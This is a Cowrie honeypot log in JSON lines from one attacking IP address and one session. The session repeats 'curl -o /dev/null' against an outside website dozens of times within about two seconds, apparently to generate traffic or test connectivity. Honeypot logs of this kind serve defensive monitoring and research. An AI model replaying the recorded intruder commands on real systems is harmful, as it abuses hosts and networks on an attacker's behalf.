{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:11.182006Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:11.227156Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:11.228171Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:11.266477Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:11.267745Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:11.315471Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:11.316389Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:11.353347Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:11.354304Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:11.390926Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:11.392117Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:11.429233Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:11.430191Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:11.468177Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:11.469092Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:11.505744Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:11.506922Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:11.544367Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:11.545022Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:11.581545Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:11.582377Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:11.620739Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:11.621637Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:11.658829Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:11.659708Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:11.708056Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:11.709071Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:11.752245Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:11.753233Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:11.797198Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:11.798125Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:11.839011Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:11.839916Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:11.884875Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:11.885790Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:11.931843Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:11.932755Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:11.971447Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:11.972322Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:12.013718Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:12.014588Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:12.053770Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:12.054595Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:12.095870Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:12.096976Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:12.143858Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:12.144703Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:12.189528Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:12.190411Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:12.231117Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:12.232324Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:12.269055Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:12.269926Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:12.306851Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:12.307647Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:12.345525Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:12.346555Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:12.382914Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:12.383677Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:12.425106Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:12.425941Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:12.463392Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:12.464123Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:12.500368Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:12.501143Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:12.548183Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:12.549023Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:12.585551Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:12.586287Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:12.622792Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:12.623584Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:12.660505Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:12.661469Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:12.698841Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:12.699649Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:12.736525Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:12.737362Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:12.774245Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:12.775104Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:12.812035Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:12.812883Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:12.849209Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:12.850008Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:12.889313Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:12.890447Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:12.937487Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:12.938408Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:12.975383Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:12.976181Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:13.012986Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:13.014069Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:13.052114Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:13.052912Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:13.090970Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:13.091795Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:13.128983Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:13.130078Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:13.166637Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:13.167516Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:13.204345Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:13.205184Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:13.250329Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:13.251479Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:13.290410Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:13.291254Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:13.338281Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:13.339309Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:13.375964Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:13.376823Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:13.413672Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:13.414561Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:13.456643Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:13.457659Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:13.495980Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:13.497160Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:13.535761Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:13.536639Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:13.573892Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:13.574980Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:13.614009Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:13.614856Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:13.654279Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:13.655290Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:13.692665Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:13.694046Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:13.750499Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:13.751550Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:13.795665Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:13.796694Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:13.836936Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
